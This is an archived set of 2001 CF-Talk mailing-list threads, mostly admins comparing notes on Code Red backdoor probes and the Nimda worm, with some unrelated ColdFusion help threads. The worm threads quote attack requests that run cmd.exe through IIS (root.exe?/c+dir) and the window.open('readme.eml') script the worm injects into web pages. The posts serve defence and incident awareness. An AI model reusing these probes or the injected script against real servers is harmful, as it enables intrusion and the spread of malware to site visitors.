can ths caught and under control.

Larry Juncker
Senior Cold Fusion Developer
Heartland Communications Group, Inc.
[EMAIL PROTECTED]

-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:58 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


 > Can you tell us Rich if it is impacting the servers ??

nah - filling up firewall but nothing else.

Are  you
 > patched, and does this thing use something new or is it the same
 > exploit as before...

Yeah - we're patched

dunno - we never got hit before.

 > -Original Message-
 > From: Paris Lundis [mailto:[EMAIL PROTECTED]]
 > Sent: 18 September 2001 16:03
 > To: CF-Talk
 > Subject: RE: Code Red backdoor triggered?
 >
 >
 > Uggh! not the code-red variations again...
 >
 > Can you tell us Rich if it is impacting the servers ?? Are  you
 > patched, and does this thing use something new or is it the same
 > exploit as before...
 >
 > Seems like it is becoming a net-30 terror :)
 >
 > -paris
 > [finding the future in the past, passing the future in the present]
 > [connecting people, places and things]
 >
 >
 > -Original Message-
 > From: Rich Wild <[EMAIL PROTECTED]>
 > Date: Tue, 18 Sep 2001 15:37:13 +0100
 > Subject: RE: Code Red backdoor triggered?
 >
 > > even we're getting hammered with syn flood attacks.
 > >
 > > Rich Wild
 > >
 > > > -Original Message-
 > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
 > > > Sent: 18 September 2001 15:52
 > > > To: CF-Talk
 > > > Subject: FW: Code Red backdoor triggered?
 > > >
 > > >
 > > > It seems there may be some unusual network activity today
 > > > worth noting.
 > > >
 > > > Dave Watts, CTO, Fig Leaf Software
 > > > http://www.figleaf.com/
 > > > voice: (202) 797-5496
 > > > fax: (202) 797-5444
 > > >
 > > >
 > > > -Original Message-
 > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
 > > > Sent: Tuesday, 18 September, 2001 10:49
 > > > To: [EMAIL PROTECTED]
 > > > Subject: RE: Code Red backdoor triggered?
 > > >
 > > >
 > > > > Heads up. Pay attention to your servers today. I just
 > > > > started detecting a *ton* of these requests. I think it's
 > > > > a follow-up worm programmed to take advantage of the
 > > > > backdoors Code Red dropped on infected computers. Maybe a
 > > > > Code Red III?
 > > > >
 > > > > -Cameron
 > > > >
 > > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
 > > > > dhcp181.onewebsystems.com
 > > > > (130.205.102.181) on port 80 (tcp).
 > > > > [09/18/2001 09:25:55.166 GMT-0400] GET
 > > > > /scripts/root.exe?/c+dir HTTP/1.0
 > > > > Host: www
 > > > > Connnection: close
 > > >
 > > > After a more careful reading, I don't think this is an attack
 > > > at all. I
 > > > think it's worse than an attack.
 > > >
 > > > The GET request doesn't do anything except run the DOS dir
 > > > command using the
 > > > command processor. But, if a server responds with an HTTP 200
 > > > status code,
 > > > this indicates that the server is vulnerable to running
 > > > cmd.exe through the
 > > > web server.
 > > >
 > > > So, my guess is that this is a vulnerability scan. Once a
 > > > list of vulnerable
 > > > servers is compiled, a real attack would take much less time
 > > > than a Code
 > > > Red-style attack, since you could build the list of
 > > > vulnerable servers into
 > > > the attack code!
 > > >
 > > > This idea has been discussed a bit in the last month or so -
 > > > it's called a
 > > > "Warhol" worm, the idea being that an attack might cover the mass
 > > of
 > > > vulnerable machines in fifteen minutes. Here's a URL to the
 > > article:
 > > >
 > > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
 > > 5&mode=nocomme
 > > nt&threshold=
 > >
 > > Dave Watts, CTO, Fig Leaf Software
 > > http://www.figleaf.com/
 > > voice: (202) 797-5496
 > > fax: (202) 797-5444
 > >
 > -
 > > ---
 > > 
 > > Control your subscriptions to ACFUG lists via the ACFUG website at
 > >
 > >
 >


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Eric Dawson

hmmm. without reading the question ... I just noticed that there is a set of 
jabber servlets available at sourceforge.net

Eric Dawson

From: Billy Cravens <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: CF-Talk <[EMAIL PROTECTED]>
Subject: RE: MSN
Date: Tue, 18 Sep 2001 10:50:08 -0500

If AIM is installed, doesn't it provide support for a proprietary
protocol (aim://) in the browser?

Also, I know that some software (like Jabber) can talk to a number of
these services at a pretty low level.  Some of it is even open source -
perhaps you could pull some code off of SourceForge and write your own
back-end

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]

-Original Message-
From: BT [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:09 AM
To: CF-Talk
Subject: RE: MSN

how can you send it to AIM?

-Original Message-
From: Dan Phillips [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:05 AM
To: CF-Talk
Subject: RE: MSN

>From what I have found, MSN is not too friendly when it comes to sending
messages unless you use their client software. I know Yahoo, AIM, and
ICQ all have a way that you can use HTML to send a message to users.

Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com

-Original Message-
From: Rey Bango [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: CF-Talk
Subject: Re: MSN

AFAIK, they have no API for that. If you find it, please let me know.
I've been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN

 > Does anyone know how to send a MSN message from a CF app ?
 >
 >
 > TIA
 >
 > Richard
 >
 >

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Format Tables (Was RE: CF to excel)

2001-09-18 Thread cf refactoring


Janine,

There seems to be an error in your posted code, as you
have 3 s to 2 . I'm surprised CF
didn't give you an error message.

It looks to me like you need to take the
#Skill# 
outside so it isn't nested inside 


I'd do something like


#Skill# 

...

Also, there's a place where it reads



where the  should go inside of 

--- Janine Jakim <[EMAIL PROTECTED]> wrote:
> Ok I answered question 2.  I found that using
> #Skill# will go
> through all the skills so that
> I don't need to do Skill1, Skill2, Skill3
> Now I still have the issue of my headers showing up
> before each student.
> This is my code:
>   
>   
>   
>   
>  #Skill#
>  
>   
>   
>   #LASTNAME#, #FIRSTNAME#
>   
> 
>#Grade#
>
>   
>   
>   
> 
> -Original Message-
> From: cf refactoring
> [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 10:38 AM
> To: CF-Talk
> Subject: Re: Format Tables (Was RE: CF to excel)
> 
> 
> Can you show us the looping code? It's probably an
> error in reusing too much of the sample code
> 
> --- Janine Jakim <[EMAIL PROTECTED]> wrote:
> > Thanks for all the input. Now for the next
> question.
> >  I am having a hard
> > time formatting my html table correctly. I am
> using
> > #Skill[1]#
> > #Skill[2]# in the heading (I have also
> > tried making it just a
> > regular .  But unfortunately it
> is
> > giving each student a
> > heading.
> > ie: Reading MathSpelling
> > JSmith  A   A   A
> > Reading MathSpelling
> > SJones  B   B   B
> > 
> > So I have 2 questions:
> > 1. Is there a way to get the heading to be for the
> > whole page when I am
> > using a variable?
> > 2.  Is there a way to make the #skill[1]#
> > #Skill[2]#, etc. expand/constrict
> > accordingly.
> > (ie: 5th grade Math has 3 skills/ reading has 16
> > skills whereas 1st grade
> > math has 21 skills and 19 reading skills) I
> > don't want to have to make a
> > different page for each subject/grade.  If I just
> > put #Skill# in the header
> > it only gives me the 1st skill... Any ideas???
> > 
> > -Original Message-
> > From: John Anderson [mailto:[EMAIL PROTECTED]]
> > Sent: Monday, September 17, 2001 4:00 PM
> > To: CF-Talk
> > Subject: RE: CF to excel
> > 
> > 
> > You can create an html table and output that is an
> > excel file as follows:
> > 
> > 
> > 
> > 
> > 
> > 
> > First Name">
> > Last
> > Name">
> > Office
> > Phone">
> > Mobile
> > Phone">
> >  > &"Pager">
> > 
> >  >
>
&"#empfirstname##emplastname##officep##ce
> > ll##pager#">
> > 
> > ">
> > 
> > 
> > 
> >  VALUE="inline;
> > filename=download.xls">
> > 
> > #excelstring#
> > 
> > 
> > 
> > This output string that you have built will come
> > across as an excel file.
> > 
> > The key is in the cfcontent tag and cfheader tag.
> > 
> > John Anderson
> > aloha-webdesign.com
> > 
> > -Original Message-
> > From: Janine Jakim [mailto:[EMAIL PROTECTED]]
> > Sent: Monday, September 17, 2001 12:40 PM
> > To: CF-Talk
> > Subject: CF to excel
> > 
> > 
> > How flexible is the process of generating excel
> > files?
> > I need to have an output that is dynamic for the
> > columns and rows.
> > For example:
> > 
> > #student#   #student#   #student#   #student#
> > #Skill# #grade# #grade# #grade# #grade#
> > #Skill# #grade# #grade# #grade# #grade#
> > #Skill# #grade# #grade# #grade# #grade#
> > 
> > Translating into:
> > JohnSmith   JanSmithSamJonessandyJones
> > Reading C  A   A   B
> > MathB  A   B   A
> > English B  B   A   C
> > 
> > My tables are normalized. There are many tables
> that
> > make this info.
> > 1.  One reference table that lists all the skills.
> 
> > 2.  One table that shows student information.
> > 3.  One table that lists the
> studentID/skillID/Grade
> > (hooks the student info
> > with the skills reference table).
> > 4.  One reference table that lists the quarter and
> > dates of the quarter so
> > only the current quarter prints out.
> > Is this possible?
> > What are the steps to making it so?  Do I need to
> > make the information into
> > an array(s) first?
> > I've read the how to from Ben's CF5 book and the
> > tutorial from cfcomet.com-
> > but of course I want to make things more
> difficult.
> > Thanks in advance.



=
I-Lin Kuo
Macromedia

RE: Code Red backdoor triggered?

2001-09-18 Thread Rich Tretola


Internet Terrorism?

Rich

-Original Message-
From: Tristram Charnley [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:17 PM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


Yes we're getting hammered too - exactly the same requests


Tristram Charnley


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Kelly Matthews


yep that's the one...

-Original Message-
From: Kola Oyedeji [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:01 PM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


This may or may not be relevant but i've just deleted an email from someone
i dont know which I'm  sure had a virus attached. It has a exe. file
attached called readme.exe. I recieved a virus warning and jsut deleted it!



Kola Oyedeji
Web developer
Macromedia Certified Advanced ColdFusion 5 Developer
http://www.Alexandermark.com
(+44)020-8429-7300


> -Original Message-
> From: Rich Wild [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:58
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
>
>
> > Can you tell us Rich if it is impacting the servers ??
>
> nah - filling up firewall but nothing else.
>
> Are  you
> > patched, and does this thing use something new or is it the same
> > exploit as before...
>
> Yeah - we're patched
>
> dunno - we never got hit before.
>
> > -Original Message-
> > From: Paris Lundis [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 16:03
> > To: CF-Talk
> > Subject: RE: Code Red backdoor triggered?
> >
> >
> > Uggh! not the code-red variations again...
> >
> > Can you tell us Rich if it is impacting the servers ?? Are  you
> > patched, and does this thing use something new or is it the same
> > exploit as before...
> >
> > Seems like it is becoming a net-30 terror :)
> >
> > -paris
> > [finding the future in the past, passing the future in the present]
> > [connecting people, places and things]
> >
> >
> > -Original Message-
> > From: Rich Wild <[EMAIL PROTECTED]>
> > Date: Tue, 18 Sep 2001 15:37:13 +0100
> > Subject: RE: Code Red backdoor triggered?
> >
> > > even we're getting hammered with syn flood attacks.
> > >
> > > Rich Wild
> > >
> > > > -Original Message-
> > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > > Sent: 18 September 2001 15:52
> > > > To: CF-Talk
> > > > Subject: FW: Code Red backdoor triggered?
> > > >
> > > >
> > > > It seems there may be some unusual network activity today
> > > > worth noting.
> > > >
> > > > Dave Watts, CTO, Fig Leaf Software
> > > > http://www.figleaf.com/
> > > > voice: (202) 797-5496
> > > > fax: (202) 797-5444
> > > >
> > > >
> > > > -Original Message-
> > > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > > Sent: Tuesday, 18 September, 2001 10:49
> > > > To: [EMAIL PROTECTED]
> > > > Subject: RE: Code Red backdoor triggered?
> > > >
> > > >
> > > > > Heads up. Pay attention to your servers today. I just
> > > > > started detecting a *ton* of these requests. I think it's
> > > > > a follow-up worm programmed to take advantage of the
> > > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > > Code Red III?
> > > > >
> > > > > -Cameron
> > > > >
> > > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > > dhcp181.onewebsystems.com
> > > > > (130.205.102.181) on port 80 (tcp).
> > > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > > Host: www
> > > > > Connnection: close
> > > >
> > > > After a more careful reading, I don't think this is an attack
> > > > at all. I
> > > > think it's worse than an attack.
> > > >
> > > > The GET request doesn't do anything except run the DOS dir
> > > > command using the
> > > > command processor. But, if a server responds with an HTTP 200
> > > > status code,
> > > > this indicates that the server is vulnerable to running
> > > > cmd.exe through the
> > > > web server.
> > > >
> > > > So, my guess is that this is a vulnerability scan. Once a
> > > > list of vulnerable
> > > > servers is compiled, a real attack would take much less time
> > > > than a Code
> > > > Red-style attack, since you could build the list of
> > > > vulnerable servers into
> > > > the attack code!
> > > >
> > > > This idea has been discussed a bit in the last month or so -
> > > > it's called a
> > > > "Warhol" worm, the idea being that an attack might
> cover the mass
> > > of
> > > > vulnerable machines in fifteen minutes. Here's a URL to the
> > > article:
> > > >
> > > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > > 5&mode=nocomme
> > > nt&threshold=
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> >
> -
> > > ---
> > > 
> > > Control your subscriptions to ACFUG lists via the ACFUG website at
> > >
> > >
> >
> 

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: MSN

2001-09-18 Thread admin


Thnks Billy,

I'l have a look at that. The customer wants to be able to do something like
livehelper.com, but in house, and without paying anything for it - usual
story !

- Original Message -
From: "Billy Cravens" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:50 AM
Subject: RE: MSN


> If AIM is installed, doesn't it provide support for a proprietary
> protocol (aim://) in the browser?
>
> Also, I know that some software (like Jabber) can talk to a number of
> these services at a pretty low level.  Some of it is even open source -
> perhaps you could pull some code off of SourceForge and write your own
> back-end
>
> ---
> Billy Cravens
> Web Development, EDS
> [EMAIL PROTECTED]
>
>
> -Original Message-
> From: BT [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 10:09 AM
> To: CF-Talk
> Subject: RE: MSN
>
>
> how can you send it to AIM?
>
>
> -Original Message-
> From: Dan Phillips [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 11:05 AM
> To: CF-Talk
> Subject: RE: MSN
>
>
> From what I have found, MSN is not too friendly when it comes to sending
> messages unless you use their client software. I know Yahoo, AIM, and
> ICQ all have a way that you can use HTML to send a message to users.
>
> Thank you,
>
> Dan Phillips
> Lead Support Technician/ColdFusion Administrator
> Express Technologies, Inc.
> dba CFXhosting.com
>
>
>
> -Original Message-
> From: Rey Bango [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 10:52 AM
> To: CF-Talk
> Subject: Re: MSN
>
>
> AFAIK, they have no API for that. If you find it, please let me know.
> I've been wanting to add the functionality myself.
>
> Rey...
>
> - Original Message -
> From: "webmaster" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 10:49 AM
> Subject: MSN
>
>
> > Does anyone know how to send a MSN message from a CF app ?
> >
> >
> > TIA
> >
> > Richard
> >
> >
>
>
>
> 
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Owens, Howard


Here's info:

http:[EMAIL PROTECTED]

Our servers are struggling under the weight of it.

H.


Howard Owens
Internet Operations Coordinator
www.insidevc.com
[EMAIL PROTECTED]
AIM: GoCatGo1956


> -Original Message-
> From: Kola Oyedeji [SMTP:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:01 AM
> To:   CF-Talk
> Subject:  RE: Code Red backdoor triggered?
> 
> This may or may not be relevant but i've just deleted an email from
> someone
> i dont know which I'm  sure had a virus attached. It has a exe. file
> attached called readme.exe. I recieved a virus warning and jsut deleted
> it!
> 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

XML Parser for CF

2001-09-18 Thread Critter


Hello CF-Talk,

  anyone have any suggestions for a decent one?

-- 
Best regards,

Critter, MMCP
Certified ColdFusion Developer

Crit[s2k] - 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: checkboxes to action pages

2001-09-18 Thread Koo Pai Lao


instead of having the checkbox have a value of "no", let it have a numeric 
value which could be an ID, or an increment and u can trace it back to the 
list :)








>From: Michael Vinson <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: CF-Talk <[EMAIL PROTECTED]>
>Subject: checkboxes to action pages
>Date: Tue, 18 Sep 2001 10:33:40 -0400
>
>Hi,
>
>I have a list of records (to delete) with checkboxes. i.e. user wants to
>delete recs & clicks checkbox
>Once the user clicks submit (Delete) Here's what I know:
>- How many items in the list
>- My 'index' to the list (using email address), which contains a subset
>of the query displayed in the form. Note that the number of email
>addresses I capture is equal to the total number of items in list.
>
>Here's what do not know:
>- How to match my form checkbox name (delChecked) to my data as
>described above! The parameters that get passed to my 'action page'
>reveal (to me, at least) a compressed list showing data (e.g. on,on,on)
>but how in the world do I match this to... item 1 checked, item 3
>checked, item 5 checked
>
>Ain't learning great!
>
>Thank in advance ... -Mike
>
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: checkboxes to action pages

2001-09-18 Thread Michael Vinson

Thanks Andy, I simply indexed my checkbox value (1,2,3...) inside a cfloop &
voila' I have my number(ed) values which correspond to the checkboxes. This
technique will have to do... But I would still like to figure how to pass the
"array" of checked values (e.g. 0,0,1,1...) to my action page. Oh well, on to
the next snag :-)>

-mv

Andy Ewings wrote:

> All of your boxes should be called the same name but each should have a
> different value representing the item in question.  so for the above example
> your 3 checkboxes would all be called name but would have 3 integer values -
> 1,2,3 representing 
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

CODE BLUE WORM was: Code Red backdoor triggered?

2001-09-18 Thread Mark W. Breneman


Looks like a new virus called "W32.Nimda.A@mm" a variant on the proof of
concept code blue worm.

This virus has a two prong attack one via E-mail and via the Unicode Web
Traversal exploit.

"the worm sends out probes to IIS servers attempting to spread by using the
Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised
servers may display a web page prompting a visitor to download an Outlook
file which contains the worm as an attachment." - Symantec
http:[EMAIL PROTECTED]
http://securityresponse.symantec.com/avcenter/venc/data/w32.bluecode.worm.ht
ml


Very little is know about the new W32.Nimda.A@mm virus.  Here is what I see.


If infected your webserver will include this text at the bottom of the home
page:


window.open("readme.eml", null, "resizable=no,top=6000,left=6000")


window.open("readme.eml", null, "resizable=no,top=6000,left=6000")


This JS will prompt you to download a file by the name of readme.eml which
contains the worm as an attachment.

This ia all I know now

Mark W. Breneman
-Cold Fusion Developer
-Network Administrator
  Vivid Media
  [EMAIL PROTECTED]
  www.vividmedia.com
  608.270.9770


-Original Message-
From: webmaster [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:31 AM
To: CF-Talk
Subject: Re: Code Red backdoor triggered?


we're seeing a HUGE number of hits all containing :-
port=3641 probes and  URL=/c/winnt/system32/cmd.exe attempts and guess where
they're coming from ?
the exact same machines that rountinly have been doing the code red thing .

Damn




 Message -
From: "Paris Lundis" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:02 AM
Subject: RE: Code Red backdoor triggered?


> Uggh! not the code-red variations again...
>
> Can you tell us Rich if it is impacting the servers ?? Are  you
> patched, and does this thing use something new or is it the same
> exploit as before...
>
> Seems like it is becoming a net-30 terror :)
>
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
>
>
> -Original Message-
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
>
> > even we're getting hammered with syn flood attacks.
> >
> > Rich Wild
> >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > >
> > >
> > > It seems there may be some unusual network activity today
> > > worth noting.
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> > >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > >
> > >
> > > > Heads up. Pay attention to your servers today. I just
> > > > started detecting a *ton* of these requests. I think it's
> > > > a follow-up worm programmed to take advantage of the
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > >
> > > > -Cameron
> > > >
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > >
> > > After a more careful reading, I don't think this is an attack
> > > at all. I
> > > think it's worse than an attack.
> > >
> > > The GET request doesn't do anything except run the DOS dir
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200
> > > status code,
> > > this indicates that the server is vulnerable to running
> > > cmd.exe through the
> > > web server.
> > >
> > > So, my guess is that this is a vulnerability scan. Once a
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time
> > > than a Code
> > > Red-style attack, since you could build the list of
> > > vulnerable servers into
> > > the attack code!
> > >
> > > This idea has been discussed a bit in the last month or so -
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > of
> > > vulnerable machines in fifteen minutes. Here's a URL to the
> > article:
> > >
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > 5&mode=nocomme
> > nt&threshold=
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> > -
> > ---
> > 
> > Control your subscriptions to ACFUG lists via the ACFUG website at
> >
> >
>

~~
Get the mailser

RE: Code Red backdoor triggered?

2001-09-18 Thread Larry Juncker


We are having the same thing happen. From looking at the IIS logs, this worm
or whatever is using cmd.exe.
We have temporarily renamed cmd.exe in the system32 folder of NT until we
can ths caught and under control.

Larry Juncker
Senior Cold Fusion Developer
Heartland Communications Group, Inc.
[EMAIL PROTECTED]

-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:58 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


> Can you tell us Rich if it is impacting the servers ??

nah - filling up firewall but nothing else.

Are  you
> patched, and does this thing use something new or is it the same
> exploit as before...

Yeah - we're patched

dunno - we never got hit before.

> -Original Message-
> From: Paris Lundis [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 16:03
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
>
>
> Uggh! not the code-red variations again...
>
> Can you tell us Rich if it is impacting the servers ?? Are  you
> patched, and does this thing use something new or is it the same
> exploit as before...
>
> Seems like it is becoming a net-30 terror :)
>
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
>
>
> -Original Message-
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
>
> > even we're getting hammered with syn flood attacks.
> >
> > Rich Wild
> >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > >
> > >
> > > It seems there may be some unusual network activity today
> > > worth noting.
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> > >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > >
> > >
> > > > Heads up. Pay attention to your servers today. I just
> > > > started detecting a *ton* of these requests. I think it's
> > > > a follow-up worm programmed to take advantage of the
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > >
> > > > -Cameron
> > > >
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > >
> > > After a more careful reading, I don't think this is an attack
> > > at all. I
> > > think it's worse than an attack.
> > >
> > > The GET request doesn't do anything except run the DOS dir
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200
> > > status code,
> > > this indicates that the server is vulnerable to running
> > > cmd.exe through the
> > > web server.
> > >
> > > So, my guess is that this is a vulnerability scan. Once a
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time
> > > than a Code
> > > Red-style attack, since you could build the list of
> > > vulnerable servers into
> > > the attack code!
> > >
> > > This idea has been discussed a bit in the last month or so -
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > of
> > > vulnerable machines in fifteen minutes. Here's a URL to the
> > article:
> > >
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > 5&mode=nocomme
> > nt&threshold=
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> >
> -
> > ---
> > 
> > Control your subscriptions to ACFUG lists via the ACFUG website at
> >
> >
>

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Kelly Matthews


I use black ice on my server. THe code red used to come in as IIS system32
command
course since i was patched it did nothing, well today i have a PLETHORA of
attacks
all labeled EITHER HTTP UTF8 backlick and HTTP URL with double-encoded ..
My guess is it's a new worm we are getting SLAMMED but it's not shutting
down
services like before the firewall is currently blocking it but not sure
exactly what
its trying to do.
KElly

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:26 AM
To: CF-Talk
Subject: FW: Code Red backdoor triggered?


More on the .eml files.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


-Original Message-
From: Dave Watts 
Sent: Tuesday, 18 September, 2001 11:25
To: '[EMAIL PROTECTED]'
Subject: RE: Code Red backdoor triggered?


> It looks like when you surf to an infected site, it opens IE 
> with a file named readme.eml which appears to contain a readme.exe.  
> I don't have an email client on the server so I dont know what 
> would happen if I did and I am not going to test it out. I 
> also see a number (at least 10 - haven't counted yet) of 
> different sites sending out requests, and interestingly they 
